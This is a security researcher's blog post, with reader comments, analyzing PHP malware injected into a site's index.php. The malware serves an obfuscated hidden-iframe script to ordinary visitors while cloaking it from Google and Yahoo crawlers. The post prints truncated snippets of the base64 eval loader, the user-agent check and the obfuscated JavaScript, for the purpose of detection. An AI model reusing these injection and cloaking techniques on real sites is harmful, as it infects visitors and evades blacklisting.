Malware hiding from Google

Google is getting pretty good at detecting web-based malware and blacklisting the sites that are hosting it. This means bad business for the attackers (or “hackers”, as the media like the call them) and as a result they are already changing their tactics to hide from Google.

Why is this bad business for the malware writers? Well, if a site gets blacklisted, less users will visit it and less people will load their malware and get infected. Good for everyone else, bad for them.

Anyway, yesterday we were analyzing a malware that added the following code to the index.php of a site:

:< ?php /**/ eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCc…
long long long line.. ? >

After we decode it, we got a code that looked like:

if (!stristr($_SERVER[“HTTP_USER_AGENT”],”googlebot”)&&
(!stristr($_SERVER[“HTTP_USER_AGENT”],”yahoo”)))
{
return base64_decode(“PHNjcmlwdD5.. ..KS5qb2luKCIiKSk7PC9zY3JpcHQ+”);
}
else
{
return “”;
}

So basically the malware was checking if the user agent was from the Google or Yahoo bot and not returning the malware on that case. For everyone else they would see the malware javascript:

var bpxDsSbm8=’d*%@o*%@c*%@u*%@%@a*%@.. %@t*%@p*%@:*%@/*%@/*%@n*%@i*%@n*%@o*
%@”*%@ *%@w*%@i*%@d*%@t*%@h*%@=*%@2*%@.. *%@h*%@e*%@i*%@g*%@h*%@t*%@=*%@2*%@
*%@f*%@r*%@a*%@m*%@e*%@b*%@o*%@r*%@d*%.. @e*%@r*%@=*%@0*%@>*%@<*%@/*%@i*%@f*%@r
;eval(bpxDsSbm8.split(‘*%@’).join(“”));

If that becomes a trend, Google will have to stop using their user agent/common IP address for the malware check.

Want to read more stories like this one? Subscribe to our RSS feed. Interested in a web site security monitoring solution? Visit sucuri.net. With malware? Need help? send us an email.

Scan your website for free:
About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • http://tonycode.com/ Tony

    There is another wordpress hack happening this week where the code only returns bogus information if the user agent is google.

    http://blog.arpitnext.com/2010/04/wordpress-search-engine-cloak-hack.html

    Any chance you can get the sucuri monitoring service to make requests as googlebot in addition to a normal browser? Just make sure you don't diff the browser vs bot content as they are sometimes different intentionally, but still send alerts anytime there is a change for either user agent.

  • Anonymous

    "If that becomes a trend, Google will have to stop using their user agent/common IP address for the malware check" -> or maybe we have to begin to use their user agent to be ignored from malware :)

  • http://www.blogger.com/profile/14980808976404159238 http://sucuri.net

    @anonymous: That would be a funny thing to do :) I wonder what the malware writers would do at that point.. lol